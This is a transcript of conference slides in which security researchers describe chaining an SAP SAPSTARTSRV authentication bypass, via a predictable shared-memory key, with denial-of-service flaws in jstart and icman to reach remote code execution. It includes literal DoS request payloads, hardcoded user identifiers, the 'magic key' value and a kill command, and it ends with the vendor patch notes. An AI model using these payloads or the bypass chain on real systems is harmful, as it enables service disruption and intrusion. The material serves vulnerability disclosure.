sap, dos, dos, race conditions => rce - confidence...
TRANSCRIPT
2
About us
Business application security expert
Yet another security researcher
ERPScan
Wiem, jak korzystać z tłumaczami
4
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of vulnerabilities in SAP and Oracle (500+)
• 100+ presentations key security conferences worldwide
• 30+ awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters Amsterdam (EU), offices in USA, Australia, Denmark
4
5
About what?
• No blah-blah-blah about how important it is to spend time and
money on SAP security (critically important)
• No blah-blah-blah about best practices
• No Junk Hacking
Just a little story how we got yet another RCE in SAP
5
7
Target
• SAP and WEB?
– XSS, CSRF, double blind self clickjacking, whatever
• SAP and ABAP/JAVA?
– RFC, servlets, ABAP code, transactions
• SAP and additional services?
– Log Viewer, SDM, notepad, archives
Try to implement some reverse engineering to core binary file
7
8
DISP+WORK.EXE
dw - disp+work - Dispatcher & Workprocess - "The complete
Kernel" - Here the complete ABAP is processed ...
8
11
DISP+WORK.EXE
Binary has a considerable size: ≈ 51 M
Ida db size: ≈ 133 M
Difficult debug network communication
11
12
DISP+WORK.EXE
Difficulties with debug network communication
Even a child can process request: difficult guess the pid of process
12
15
Instance profile cfg
rdisp/TRACE = 2
rdisp/TRACE_RESOLUTION = 2
rdisp/TRACE_LOGGING = on
rdisp/TRACE_HIDE_SEC_DATA = off
rdisp/TRACE_COMPS = 2
enque/TRACE = 2
alert/TRACE = 2
service/trace = 2
rdisp/configurable_wp_no = 0
rdisp/wp_max_no = 0
rdisp/wp_no_dia = 1
rdisp/wp_no_btc = 0
rdisp/wp_no_vb = 0
rdisp/wp_no_vb2 = 0
rdisp/wp_no_spo = 0
15
16
Instance profile cfg
rdisp/TRACE = 2rdisp/TRACE_RESOLUTION = 2rdisp/TRACE_LOGGING = onrdisp/TRACE_HIDE_SEC_DATA = offrdisp/TRACE_COMPS = 2enque/TRACE = 2alert/TRACE = 2service/trace = 2
rdisp/configurable_wp_no = 0 rdisp/wp_max_no = 0rdisp/wp_no_dia = 1rdisp/wp_no_btc = 0rdisp/wp_no_vb = 0rdisp/wp_no_vb2 = 0rdisp/wp_no_spo = 0
16
Number of configurable work processes
25
Reverse engineering of DISP+WORK.EXE
• But– It’s too difficult
– It’s too big
– I’m too lazy
– RCE takes too much time
26
Reverse engineering of DISP+WORK.EXE
• But– It’s too difficult
– It’s too big
– I’m too lazy
– RCE takes too much time (maybe)
28
SEEK AND DESTROY
• Disp+work – here the complete ABAP is processed
• Gwrd – SAP gateway
• Icman (icm) – SAP Web Application Server
• Jstart – SAP AS Java Instance
• Sapstart – SAP starter
• Igswd_mt – SAP IGS (Internet Graphics Service )
• Igsmux_mt – SAP IGS
• Igspw_mt – SAP IGS
32
SAPSTARTSRV
• ≈ 15M
• LISTEN tcp 0 0.0.0.0:5NN13
• SOAP– SAPControl:OSExecute ☺
• But ☹– We need authentication
33
Reverse engineering of SAPSTARTSRV
• IsTrustedInternalConnect()– JsfOpenShm()
– JsfCheckShmKeyString()
– JsfCloseShm()
34
Reverse engineering of SAPSTARTSRV
IsTrustedInternalConnect()– Hardcoded user names
• “{2D4A6FB8-37F1-43d7-88BE-AD279C89DCD7}”User name for requests with a temporary local logon tickets.
• “{221BA44F-F88E-4166-BB2B-E2541910B86A}”UNDOCUMENTED HARDCODED USER NAME
40
Shared memory
SHM - Shared Memory is an efficient means of passing data between programs. One program will create a memory portion which other processes (if permitted) can access.
42
Shared memory
•IsTrustedInternalConnect()
–JsfOpenShm() - ok
–JsfCheckShmKeyString()
–JsfCloseShm()
43
Shared memory
•IsTrustedInternalConnect()
–JsfOpenShm() - ok
–JsfCheckShmKeyString()
–JsfCloseShm() - ok
44
Shared memory
•IsTrustedInternalConnect()
–JsfOpenShm() - ok
–JsfCheckShmKeyString() - ???
–JsfCloseShm() - ok
45
Shared memory
• JsfCheckShmKeyString()
•What is this key?
•Is this key static?
•Can we guess this key (if not static)?
•Can we brut this key?
46
Shared memory
• JsfCheckShmKeyString() What is this key?
• password for authentication on SAPSTARTSRV
• Is this key static?
• Can we guess key (if not static)?
• Can we brut this key?
47
Shared memory
• JsfCheckShmKeyString()
• Is this key static?• No
– Rng_PseudoRandomInit
– Rng_PseudoRandom
– Rng_CompleteUpdate
– Key len 36 bytes
• Can we guess this key (if not static)?
• Can we brut this key?
48
Shared memory
• JsfCheckShmKeyString()
• Is this key static?• No
– Rng_PseudoRandomInit
– Rng_PseudoRandom
– Rng_CompleteUpdate
– Key len 36 bytes
• Can we guess this key (if not static)? - No
• Can we brut this key?
49
Shared memory
• JsfCheckShmKeyString()
• Is this key static?• No
– Rng_PseudoRandomInit
– Rng_PseudoRandom
– Rng_CompleteUpdate
– Key len 36 bytes
• Can we guess this key (if not static)? - No
• Can we brut this key? - No
61
• JsfCheckShmKeyString()– Read raw (binary) key from shm memory
– Convert key to readable format
– Add ‘x’ to end and ‘x’ to begin of key ☺ (why?)
– Check key with user input
– Return result
63
In our casexAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
is a printable presentation of raw key
Hex dump: 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00
65
In our casexAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx
is a printable presentation of raw key
Hex dump: 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00
Some shared memory problems?
69
Instance profile cfg
rdisp/TRACE = 1337
rdisp/TRACE_RESOLUTION = 1337
rdisp/TRACE_LOGGING = on
rdisp/TRACE_HIDE_SEC_DATA = off
rdisp/TRACE_COMPS = 7
enque/TRACE = 7
alert/TRACE = 7
service/trace = 7
rdisp/configurable_wp_no = 0
rdisp/wp_max_no = 0
rdisp/wp_no_dia = 1
rdisp/wp_no_btc = 0
rdisp/wp_no_vb = 0
rdisp/wp_no_vb2 = 0
rdisp/wp_no_spo = 0
69
70
Instance profile cfg
#rdisp/TRACE = 1337
#rdisp/TRACE_RESOLUTION = 1337
#rdisp/TRACE_LOGGING = on
#rdisp/TRACE_HIDE_SEC_DATA = off
#rdisp/TRACE_COMPS = 7
#enque/TRACE = 7
#alert/TRACE = 7
#service/trace = 7
#rdisp/configurable_wp_no = 0
#rdisp/wp_max_no = 0
#rdisp/wp_no_dia = 1
#rdisp/wp_no_btc = 0
#rdisp/wp_no_vb = 0
#rdisp/wp_no_vb2 = 0
#rdisp/wp_no_spo = 0
70
71
Instance profile cfg
#rdisp/TRACE = 1337
#rdisp/TRACE_RESOLUTION = 1337
#rdisp/TRACE_LOGGING = on
#rdisp/TRACE_HIDE_SEC_DATA = off
#rdisp/TRACE_COMPS = 7
#enque/TRACE = 7
#alert/TRACE = 7
#service/trace = 7 + RESTART WHOLE SYSTEM (OS)
#rdisp/configurable_wp_no = 0
#rdisp/wp_max_no = 0
#rdisp/wp_no_dia = 1
#rdisp/wp_no_btc = 0
#rdisp/wp_no_vb = 0
#rdisp/wp_no_vb2 = 0
#rdisp/wp_no_spo = 0
71
75
Random ShmKey …
• After restart– Jstart started
– “Random” ShmKeyStrting indeed random– This key is NOT working
“xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx”
82
HOW ABOUT JSTART …Plan A:
Run
authBypassOSExec_poc.py (with “magic key”)
try to kill jstart (now only local)
83
HOW ABOUT JSTART …Plan A:
Run
authBypassOSExec_poc.py (with “magic key”)
try to kill jstart (now only local)
$ killall –r jstart -9
97
REMOTE RCE
• PLAN – Run authBypassOSExec_poc.py (with magic key)
– Find remote DoS for jstart
– Find remote DoS for icman
102
JSTART DoS
• DoS after ≈ 3 days
• Possible race condition
• Jstart restart after a crash
• EASY TARGET ^_^
103
JSTART DoS
Multiply request:
"\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA“
107
ICM
• ICM in the SAP NetWeaver Application Server. The ICM is a component of the SAP NetWeaver Application Server. It is implemented as a separate process, which is started and monitored by the ABAP dispatcher.
• One of core component of SAP
108
ICM
– Binary name icman.exe
– Size 5.7M
– IDA db ~ 100M
– One of core components of SAP => thoroughly audited
116
ICM DoS
• Multiple requests :
'get / HTTP/1.0\r\nhost:\r\ncookie: ;\x0c%s\r\n\r\n' % ("\x0c" * 0x1b58)
• icman restart after a crash
117
PROBLEMS …
• Race conditions …• If We kill jstart before icman => NO RCE
• Small gap for a magic key between jstart and icman start
119
Solutions…
• ICM DoS:– SAP note 2256185 (Dmitry Yudin)
• Jstart DoS:– SAP note 2259547 (Dmitry Yudin)
• MC auth bypass:– SAP note 2259547 (Dmitry Chastuhin, Dmitry Yudin)
120
Conclusion
• Don’t give up. If you can't exploit vulnerability using one issue try to find another way to trigger it
• Holistic approach + correlation (code, SOD, vulnerabilities)
• Probably a lot of vulnerabilities still do exist on a binary level of different SAP services
• Have fun!
121121
About
228 Hamilton Avenue, Fl. 3,Palo Alto, CA. 94301
USA HQ
Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam
EU HQ
www.erpscan.com [email protected]
@_chipik @ret5et